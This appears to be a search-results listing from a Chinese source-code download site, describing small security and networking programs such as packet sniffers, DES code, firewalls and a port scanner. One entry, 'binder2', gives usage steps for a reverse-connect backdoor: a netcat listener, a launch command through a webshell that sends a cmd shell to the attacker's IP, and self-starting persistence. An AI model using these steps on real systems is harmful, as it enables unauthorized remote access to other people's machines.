搜索资源列表
捕获IP数据包的小程序(c)
- 捕获IP数据包的小程序,原理是使用PCAP库.开发语言为C-IP packet capture the small programs, principles for the use of Cards. For the C programming language
DES 加密系统的 C 语言源代码
- 一个可直接使用的DES加密算法,不需要修改代码。-a direct access to the DES encryption algorithm and do not need to amend the code.
binder2
- 简介: 在WEB的渗透测试中,我们经常会遇到主机端口被过滤的情况,虽然成功创建后门,但是连接不上,这时,这个反弹式后门也许能起上点作用. 用法: 1. 在本地机器监听一个端口: netcat -vv -l -p 80 2. 通过webShell或是别的什么运行后门: binder2 80 youIPadd 3. 本地监听端口将截获一个来自远程主机的cmd. 注意: 程序本身会创建一个自启动方法, 如果没有参
antiarp
- 一个中国人自发组织的开源项目,使用vs 2008 开发,使用ndis开发是arp防火墙,开发语言为c++。-A Chinese self-organized open-source projects, use vs 2008 to develop, use arp firewall ndis development is the development of language is c++.
CFCA
- CFCA安全认证组件及使用代码实例程序C#-CFCA safety certification program components and use the C# code examples
Firewall
- c++编写的防火墙 简单使用,信息安全综合试验 代码全-c prepared by the firewall Simple to use Code all
portscan
- 端口扫描程序 C#编写 适合于初学者学习使用 本程序的开发工具是VS2010-Port scanning procedures, C# language, suitable for beginners learning to use, this procedure is the development tool VS2010
libpcap-pktsocket
- 基于libpcap的C编程,用于截获网络上面的数据流的内容,使用socket,用libpcap实现这个功能-Libpcap-based C programming for the network to intercept the content above data stream, using socket, to achieve this functionality with libpcap